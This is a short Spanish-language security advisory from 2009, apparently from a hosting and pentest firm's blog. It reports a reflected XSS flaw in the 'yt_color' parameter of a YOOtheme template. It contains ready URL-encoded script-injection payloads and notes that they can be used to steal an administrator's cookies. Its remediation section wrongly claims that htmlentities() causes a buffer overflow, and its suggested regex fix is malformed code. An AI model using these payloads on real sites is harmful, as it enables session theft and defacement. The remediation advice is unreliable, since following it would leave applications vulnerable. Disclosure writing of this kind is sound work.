yt_color YOOOtheme [xss]

El día 4/12/09 el señor Andrés Gómez, miembro del staff de HYPERNETHOST & Security-Pentest ha descubierto una vulnerabilidad para el “yt_color” de “YOOOtheme” que permite a un atacante inyectar código html arbitrariamente. Permitiendole así modificar el index de la página o bien robarse las cookies de un administrador de la misma.

##########################[HYPERNETHOST]##########################

# La variable GET de yt_color acepta cualquier tipo de scrypts

########################################################################

# Ejemplo 1: index.php/inicio?yt_color=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E

# Ejemplo 2: index.php?option=com_content&task=view&id=13&Itemid=47&yt_color=%00'%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E

# Ejemplo 3: "+onmouseover=alert(123456)+

########################################################################

# Usuarios malintencionados podrían inyectar código JavaScript, VBScript, ActiveX, HTML o Flash

# dentro de la aplicacion vulnerable. Con la finalidad de obtener información "privilegiada".

# Un atacante podría robarle las cookies a un administrador.

########################################################################

# Solución 1:

# Use las funciones htmlentities() o htmlspecialchars()

#Ejemplo Solución 1 : $name=htmlentities($_GET['name'])

# Cabe destacar que al usar htmlentities() o htmlspecialchars(), estamos generando un bug de

# Buffer Overfolw, por lo que recomendamos no usar la primera solución.

# Solución 2:

# $_GET = preg_replace(“|([^\w\s\'])|i”,”,$_GET);
# $_POST = preg_replace(“|([^\w\s\'])|i”,”,$_POST);

########################################################################

# Saludos : Mauro Rossi

##########################[HYPERNETHOST]#################################

Comments are closed.

yt_color YOOOtheme [xss]

– HYPERNETHOST –

Sobre el Blog

Clientes

Servicios

Socios De Negocios